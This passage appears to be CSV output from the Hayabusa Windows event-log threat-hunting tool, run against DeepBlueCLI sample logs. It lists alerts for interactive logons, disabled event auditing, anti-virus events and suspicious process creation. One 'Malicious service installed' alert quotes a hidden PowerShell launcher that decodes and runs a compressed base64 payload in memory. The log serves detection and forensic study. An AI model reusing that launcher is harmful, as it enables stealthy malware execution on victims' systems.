: IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1b293 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1b2fd : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:49:40.000 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 
0x1b293,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:51:41.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-18 23:51:41.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-18 23:52:55.692 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:52:55.692 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 00:28:28.043 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1b2fd,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:29:27.609 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:29:28.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 00:29:29.859 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: 
localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1aae1 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:29:29.859 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1af2f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:29:29.859 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1aae1,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:31:31.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 00:31:31.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 
+09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 00:43:46.923 +09:00,IE10Win7,4719,high,Disabling Windows Event 
Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 01:24:07.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:24:07.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:24:10.343 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:24:10.343 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:52:58.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 01:52:59.704 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:52:59.704 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 01:55:00.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 01:55:00.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 02:39:39.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 02:39:39.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 03:46:19.937 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-19 03:46:20.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 03:57:18.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 03:57:18.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 03:57:20.937 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 03:57:20.937 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 04:55:50.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public 
IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 04:55:51.755 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 04:55:51.755 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 04:57:52.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 04:57:52.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: SYyGmEHvgHiGYApk : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 07:54:48.533 
+09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 07:54:48.533 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 11:07:47.443 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 11:07:47.443 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 11:19:46.459 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 11:19:46.459 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 22:57:54.520 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-19 22:57:54.520 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 05:09:55.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 05:09:55.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 05:09:57.843 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 05:09:57.843 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 05:47:29.854 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 05:47:29.854 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 06:47:30.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 06:47:30.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 08:02:19.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 08:02:19.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 08:02:22.296 +09:00,IE10Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-20 08:02:22.296 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-21 01:03:05.348 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-21 01:03:05.348 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-21 05:05:57.517 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-21 05:05:57.517 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-21 05:05:59.973 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-21 05:05:59.973 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:00:11.001 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:00:11.001 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:03:27.106 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:03:27.106 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:42:09.518 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:42:09.518 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:45:28.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-22 06:47:30.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-22 06:47:30.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-23 09:12:59.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-23 09:12:59.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-23 09:13:02.546 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-23 09:13:02.546 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-23 11:24:05.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-23 11:24:05.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-25 06:17:07.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-25 06:17:07.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-25 06:17:10.203 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-25 06:17:10.203 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-25 06:25:05.171 +09:00,IE10Win7,4688,high,Relevant Anti-Virus 
Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:25:59.734 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:26:37.046 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:27:31.828 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:30:06.203 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:38:23.076 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:51:10.232 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:51:19.681 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 00:03:05.603 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-26 00:03:05.603 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-26 00:04:55.947 +09:00,IE10Win7,4688,high,Relevant 
Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-26 05:43:45.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-26 05:43:45.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-26 05:43:48.140 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-26 05:43:48.140 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-27 05:34:49.928 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-27 05:34:49.928 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-27 09:43:11.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-27 09:43:11.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-28 00:20:56.556 +09:00,IE10Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-28 00:20:56.556 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-28 00:31:15.759 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:32:08.574 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:32:35.199 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 00:34:22.339 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-28 06:44:54.195 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-28 06:44:54.195 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-28 13:15:03.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-28 13:15:03.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 
+2016-08-29 23:37:30.711 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-29 23:37:30.711 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-29 23:37:47.253 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-29 23:37:47.253 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 00:26:09.514 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 00:26:09.514 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 